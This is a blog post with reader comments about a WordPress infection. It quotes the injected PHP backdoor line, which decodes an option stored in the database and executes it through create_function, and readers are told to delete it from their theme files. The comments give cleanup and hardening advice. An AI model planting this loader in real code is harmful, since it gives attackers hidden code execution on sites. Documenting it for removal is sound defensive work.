A New-ish WordPress Hack

DELETE anything that looks like the below from all your theme files.

$z=get_option(“_transient_feed_fbc2353992919b11fc48934d3e55bd94″); $z=base64_decode(str_rot13($z)); if(strpos($z,”95A5440F”)!==false){ $_z=create_function(“”,$z); @$_z(); }

 

 

 

If you found this information helpful, please consider making a donation. No amount is too small.
paypal.me/andrewapeterson

Bitcoin Donation Address:
1KAAN2ULpdZ2cjegDHYTXP1qXGLUybs5H6

14 Replies to “A New-ish WordPress Hack”

  1. Hi there – could you point me to some more information about this hack? One of the sites I work on might be infected. It’s broken because it has that variable appended on some of the files. Where do I look for the Base64 code?

  2. @techgirl,
    You know,
    I don’t really know for sure. You’re probably smarter than me.
    BUT
    I do know that you should check all the site’s file permissions. The hosting company can probably do a site-wide reset.
    You should also look through the database. One site I saw this on, at one point, had it’s “name” as in Settings>>General and/or siteurl and/or home settings from the wp_options table overwritten.
    Also, a user may be injected.
    Probably just overwrite the entire WP core through the auto installer.
    Can you get into the site at all?
    Also, usually there’s a big chunk of encrypted nonesense in one of the theme files with these hacks, but I didn’t see any such thing with the two sites I’ve seen that have had this newish hack.
    What hosting company is it?
    It might actually be their fault.
    Please keep my updated as I like to publish this kind of stuff for the next frustrated victim.

    I’m happy to help if you think I can.

    -Andrew

  3. I can’t get into the WP dashboard, and, strangely, I can’t find the site DB to search it that way. The DBs for the client’s other web sites in the same hosting account are all there.

    The host is Dreamhost. They originally dismissed hacking, but no one has replied to any of my emails about this strange z variable. This may be a coincidence, but a few hours ago the data center that would be handling my client’s web site went down for “maintenance”. Perhaps there is something more going on here.

    I can still access the site files via ftp, so if I knew where to look, I could just manually replace problem files.

  4. OK
    Well if it’s like what happened to me, there’s a redirect on the login screen.
    try temporarily renaming .htaccess, so the permalink settings willl be disabled.

    You need to find the database in the hosting account. From there, in wp_users or wp_usermeta or something like that, you can at least get the usernames and change email addresses of users so you can do a password reset if you need to.

    The malware is most likely in several theme files. Usually in files that most wp themes contain such as
    index.php
    header.php
    footer.php
    single.php
    page.php
    (all in site.com/wp-content/themes/yourtheme/)
    But you should really open every single php file in all installed themes and scan for the code.

    Dreamhost is usually pretty solid. You don’t see the database in the control panel of the account? In case you’re not sure, use wp-config.php to get the database name/password and table prefix (which might not be wp_ )

    you can email me @ andrew a pet e r son at gmai l . com

  5. Still can’t get into the dashboard. However, as I check all the files modified on 1/7 I’m seeing a $z trend.

    wp-content/themes/atahualpa

    functions.php – $z near top
    index.php – $z near top

    In plugins almost every plugin file was modified 1/7 (including askimet), and they have $z near the top.

    Searching for “64” finds nothing.

    Are seemingly random placements of $z enough for me to call it a hack? Yesterday Dreamhost declared the plugins fine, but I think they just tried turning them on and off.

  6. Yes.
    All that Z shit is malware.
    Just remove the entire PHP section
    < ?php some shit ?>

    Back up everything first, and check one file at a time.
    You can rename the entire /plugins/ folder to bulk-deactivate the plugins.

    AAP

  7. Won’t the $z stuff just come back if I can’t find what’s placing the variable? I’m pretty curious about what it’s supposed to contain, too.

  8. the vulnerability is a combination of:

    out of date software (update plugins, themes, wp core… this is probably the main thing)

    lenient permission (it’s possible that someone set permissions to the wrong thing at some point to get a plugin to work)

    weak passwords (well.. you know)

    Server configuration that has a back door (unlikely with dreamhost, but possible)

    …So remove the malware code to get things to come back to life, update user passwords and remove unneeded users, update all the software and have the hosting company reset the file permissions.

  9. Also, any other WP installations on the same hosting account are likely compromised, even if they haven’t started acting up yet.

  10. aw.

    Okay, I’ll check the others tomorrow. This account is very old, but I’ve updated WP regularly, and I’ve tried to keep on top of the latest security measures.

    While hunting, it occurred to me that a hacker might enjoy the irony of getting in through the “automated updates” plugin. The $z could stand for zip. But still no luck finding the base64 statement.

    I wish I could get into the db so I could just search all the files in one go. There’s probably some shell way to do it, but that’s beyond my skillset.

  11. I got into the db. It wasn’t missing – I was just confused by the lack of title consistency (and mystified why the oldest/biggest web site has a miniscule db).

    Anyway I found base64 in wp_options – but it’s in the info for the exploit scanner plugin, where it’s supposed to be. I’m trying to get a closer look at the exploit scanner plugin, but phpmyadmin won’t let me browse it for some reason.

  12. I don’t think you need to worry too much about that. I think you just need to clean the files, get into the site, update everything, update passwords and fix file permissions. Good luck.

Comments are closed.